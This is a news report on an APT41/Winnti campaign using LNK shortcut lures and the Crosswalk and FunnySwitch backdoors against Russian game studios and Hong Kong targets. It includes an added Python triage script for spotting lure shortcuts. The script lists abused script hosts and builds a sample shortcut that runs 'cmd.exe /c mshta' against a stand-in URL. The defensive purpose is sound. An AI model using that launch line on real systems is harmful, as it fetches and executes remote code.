Cybersecurity researchers have uncovered a series of sophisticated cyberattacks orchestrated by a Chinese threat actor, targeting organizations in Russia and Hong Kong. The campaign is notable for its deployment of a previously undocumented backdoor, illustrating how threats in today’s digital landscape continue to evolve.
Researchers from Positive Technologies attribute these attacks to a group recognized as Winnti, commonly referred to as APT41. The initial attack is traced back to May 12, 2020, involving the use of LNK shortcuts designed to extract and execute a malicious payload. A follow-up attack on May 30 additionally utilized a malicious RAR file, which contained links disguised as PDF documents, purportedly offering a resume and an IELTS score report.
The LNK shortcuts in this campaign were strategically linked to pages on Zeplin, a legitimate collaboration platform used by developers. Upon accessing these pages, the final-stage malware—comprising a shellcode loader dubbed “svchast.exe”—was deployed alongside a backdoor named Crosswalk (“3t54dE3r.tmp”).
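The shortcut lure described above (an LNK file posing as a document that retrieves its payload from a web page) can be triaged without opening it. The following Python is an added example, not code from Positive Technologies or from this article: it parses the shell-link StringData fields laid out in the MS-SHLLINK specification and flags the double-extension pattern; the script-host list and the sample shortcut are constructed assumptions, not indicators from the campaign.

```python
import struct

# LinkFlags bits and the ShellLink CLSID from the MS-SHLLINK specification
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_REL_PATH), ("working_dir", HAS_WORK_DIR),
                 ("arguments", HAS_ARGS), ("icon_location", HAS_ICON)]  # StringData order
SCRIPT_HOSTS = ("cmd.exe", "powershell", "mshta", "wscript", "cscript", "rundll32", "certutil")

def parse_lnk(data):
    """Return the StringData fields of a shell link, skipping the ID list and LinkInfo blocks."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags, pos = struct.unpack_from("<I", data, 20)[0], 0x4C  # skip fixed-size header
    if flags & HAS_ID_LIST:    # IDListSize (2 bytes) followed by the LinkTargetIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for key, bit in STRING_FIELDS:
        fields[key] = ""
        if flags & bit:        # CountCharacters (2 bytes) then an unterminated string
            count, width = struct.unpack_from("<H", data, pos)[0], 2 if flags & IS_UNICODE else 1
            fields[key] = data[pos + 2:pos + 2 + count * width].decode(
                "utf-16-le" if width == 2 else "cp1252", "replace")
            pos += 2 + count * width
    return fields

def lure_indicators(filename, data):
    """Reasons a shortcut looks like a document lure: double extension, script host, remote URL."""
    fields, reasons, name = parse_lnk(data), [], filename.lower()
    if name.endswith(".lnk") and name[:-4].endswith((".pdf", ".doc", ".docx", ".xls")):
        reasons.append("document extension masquerade")
    launcher = (fields["relative_path"] + " " + fields["arguments"]).lower()
    reasons += ["launches " + host for host in SCRIPT_HOSTS if host in launcher]
    if "http://" in launcher or "https://" in launcher:
        reasons.append("fetches remote content")
    return reasons

def build_lnk(relative_path, arguments, icon_location=""):
    """Assemble a minimal Unicode shell link; used only to construct a sample, not a real artefact."""
    flags = IS_UNICODE | HAS_REL_PATH | HAS_ARGS | (HAS_ICON if icon_location else 0)
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags) + bytes(0x4C - 24)
    strings = [s for s in (relative_path, arguments, icon_location) if s]  # same order as parse
    return header + b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)

# Constructed sample: a "resume.pdf.lnk" that really starts cmd.exe and mshta against a URL
SAMPLE_NAME = "resume.pdf.lnk"
SAMPLE_LNK = build_lnk(r"..\..\Windows\System32\cmd.exe", "/c mshta https://example.invalid/lure")
```

Running `lure_indicators(SAMPLE_NAME, SAMPLE_LNK)` on the constructed sample returns all three indicator classes; a shortcut to an ordinary application with no script host or URL returns an empty list.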
FireEye first documented Crosswalk in 2017 as a stripped-down modular backdoor designed for system reconnaissance and capable of downloading additional modules as needed from an attacker-controlled server. This flexibility in operations raises significant concerns for affected organizations.
The operational methods of this group bear resemblances to those of another notorious actor, Higaisa, known for exploiting LNK files in 2020 to compromise victims via email. However, the utilization of Crosswalk firmly links these attacks to Winnti, especially given the overlap of infrastructure observed in the attack samples, with connections to prior Winnti operations, particularly those targeting the online gaming sector.
Targets, including Battlestate Games, a game development company based in St. Petersburg, underscore the ongoing risk to software studios—a subset often less vigilant regarding cybersecurity protocols. Moreover, researchers discovered additional attack samples comprising RAR files loaded with Cobalt Strike Beacon payloads, one of which referenced U.S. protests as a social engineering lure to entice victims.
In a separate incident, compromised certificates from the Taiwanese organization Zealot Digital facilitated attacks on Hong Kong entities using Crosswalk, along with Metasploit injectors and additional malware types like ShadowPad, Paranoid PlugX, and a new .NET backdoor referred to as FunnySwitch.
FunnySwitch, reportedly still under development, can gather system data and execute arbitrary JScript. Its similarities to Crosswalk suggest a possible connection between the development teams behind the two malware families. This insight reinforces earlier findings that linked Paranoid PlugX to attacks on the gaming industry in 2017, strengthening the case for collaboration between these malicious actors.
Researchers emphasize that Winnti’s campaign remains a persistent threat to game developers and publishers in Russia and beyond. These companies, often less equipped in cybersecurity measures, make attractive targets for cybercriminals. The risks posed by breaches in software development are profound, as the past incidents involving CCleaner and ASUS illustrate. With such ongoing threats, vigilance in cybersecurity remains paramount for businesses in the industry.